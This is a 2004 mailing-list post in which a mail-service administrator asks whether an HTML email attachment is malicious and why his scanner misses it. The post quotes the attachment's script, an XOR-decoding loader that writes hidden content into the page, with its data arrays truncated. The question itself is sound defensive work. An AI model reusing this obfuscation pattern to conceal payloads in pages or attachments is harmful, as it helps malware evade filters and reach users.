Possible virus in JavaScript attachment?
Jim Holland
mailscanner at MANGO.ZW
Mon Mar 8 21:30:02 GMT 2004
I have come across a number of suspicious messages with subject line
"hi", body text "This message has an attach", and the attachment
"superscripted.html", which contains the following type of scripting:
<script language="JavaScript">
difficulties = new Array(115,
180,145,215,7,246,108,140,123,22,242,
. . .
231,65,65,159,150,180,80,101,27,27,
218);
bribed = new Array(79,
220,229,186,107,200,97,134,71,116,157,
. . .
80,73,78,111,124,5,90,139,104,129
);
Shelton = 1142;
rupee = 231;
var obelisk = "";
for(Winslow = 0; Winslow < Shelton; Winslow++)
obelisk = obelisk + String.fromCharCode(difficulties[Winslow] ^
bribed[Winslow % rupee]);
document.write(obelisk);
</script>
These are not being blocked by MailScanner/ClamAV. I don't know any
JavaScript, but the above looks distinctly suspect. Does anyone know what
it is all about/whether it is potentially harmful? Does this indicate a
possible exploit that should be blocked?
We automatically quarantine any html attachments that contain scripting,
but this is just done by testing using a simple grep and has nothing to do
with MailScanner. Are we just being paranoid? I would prefer to have
this done by MailScanner for consistency.
Regards
Jim Holland
System Administrator
MANGO - Zimbabwe's non-profit e-mail service
More information about the MailScanner
mailing list